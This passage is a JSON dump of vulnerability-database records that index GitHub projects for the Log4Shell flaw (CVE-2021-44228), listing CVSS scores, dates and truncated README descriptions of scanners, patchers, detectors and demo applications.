"bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-18T12:50:14", "id": "9E16D977-AA24-57C3-9BD1-98296F3186F5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-13T18:11:02", "description": "# Log4j dork scanner\nThis is an auto script to search, scrape an...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T12:01:52", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-13T14:53:55", "id": "A6308120-6A99-5D2D-A1F7-6384AC37959C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-30T14:04:00", "description": "# Log4NoShell\nA runtime patcher that disables Apache Log4J's JND...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T21:59:31", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-05-26T08:53:08", "id": "1097EF60-FC77-5135-B92B-4A84B46FABAF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-10T23:39:31", "description": "# vulescanjndilookup\n\nHERRAMIENTA AUTOMATIZADA PARA LA DETECCION...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T14:57:30", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T15:56:57", "id": "2F83846E-DF16-5074-98CB-01158DE1C6C6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-17T17:56:24", "description": "# How-to-check-log4j-CVE-2021-44228\n![](./assets/log4jBanner.gif...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T07:51:28", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-17T16:19:51", "id": "1C354B89-0050-508B-98F4-B43CBD84F364", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-16T17:07:25", "description": "# CVE-2021-44228(Apache Log4j Remote Code Execution\uff09\nVersions Af...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-16T14:31:14", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T14:31:45", "id": "5C116D88-E2CC-5BC3-9A71-3174292E227D", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-30T19:39:12", "description": "# Log4Shell sample vulnerable application (CVE-2021-44228)\n\nThis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T12:38:20", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-30T14:58:58", "id": "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-29T09:37:29", "description": "# Log4j-check\n\u652f\u6301RC1\u7ed5\u8fc7\nlog4J burp\u88ab\u626b\u63d2\u4ef6\u3001CVE-2021-44228\u3001\u652f\u6301RC1\u7ed5\u8fc7\u3001\u652f\u6301js...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T01:55:51", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-29T07:51:19", "id": "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-17T20:07:34", "description": "<h1 align=\"center\">\n <br>\n log4j-detect\n</h1>\n\n<h4 align=\"cent...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T13:09:19", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T13:22:11", "id": "D02E385B-76D7-5BDB-A49C-CE858BEB0009", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-24T23:14:35", "description": "# log4j-CVE-2021-44228-test\ndemo projects to highlight how to ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T15:11:15", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-24T22:09:51", "id": "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-10T00:00:00", "description": "# cve-2021-44228-qingteng-online-patch \n\n## What is this\n\nHot-pa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T15:30:55", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T10:44:22", "id": "8D0CF3A6-EC3F-536C-A424-08879FF2F158", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-15T11:15:49", "description": "# CVE-2021-44228 Spring Boot Test Service\nThis is a dirty hack s...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T13:05:26", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T10:01:39", "id": "5B6C990F-05A3-5D83-83DF-386A34FB8560", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-19T17:12:44", "description": "# Log4Shell\u590d\u73b0\u73af\u5883\n\n## \u793a\u4f8b\u8bf4\u660e\n\n\u88ab\u653b\u51fb\u673aip\uff1a47.47.47.47\n\n\u653b\u51fb\u673aip\uff1a48.48.48.48\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T08:43:45", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-19T14:37:26", "id": "8D604793-908D-5C35-A3EF-6D2688A10312", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-03T00:06:11", "description": "# log4j-log4shell-affected\nLists of affected components and affe...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T14:05:05", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-02T21:28:56", "id": "FB83113C-AABD-5893-8DDE-332B57F4FDD4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:13:55", "description": "# aws-log4j-mitigations\n\nMitigations ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T08:01:55", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T08:05:42", "id": "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-10T00:00:00", "description": "# yLog4j\n\nThis is Y-Sec's @PortSwigger Burp Plugin for the Log4j...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-31T09:54:19", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-31T14:15:57", "id": "BFB49B3A-706B-5625-9899-54FCB1EE767B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-13T08:29:58", "description": "#### #1 \u4f7f\u7528\u8bf4\u660e\n\nCVE-2021-44228 log4j 2.x rce\u6f0f\u6d1e\u68c0\u6d4b\u5de5\u5177\uff0c\u5bf9\u76ee\u6807\u94fe\u63a5\u53d1\u8d77get\u8bf7\u6c42\u5e76\u5229\u7528...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-24T02:31:47", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-13T06:33:39", "id": "AF93C0CA-BFDD-5C90-9D8D-55350790E1D1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-20T23:12:20", "description": "Log4JS File & Vulnerability Scanner + Local Port Bind Scanner\n\nT...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T01:38:25", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T22:11:34", "id": "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-20T11:08:05", "description": "# Apache Log4j Zero Day aka Log4Shell aka CVE-2021-44228\n\n<!-- v...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T10:34:06", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T10:34:18", "id": "F4C136DE-892B-5921-8475-E30BD548DDBB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-15T18:01:48", "description": "# Log4j_Vulnerability_Demo\nA simple program to demonstrate how L...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T15:24:20", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 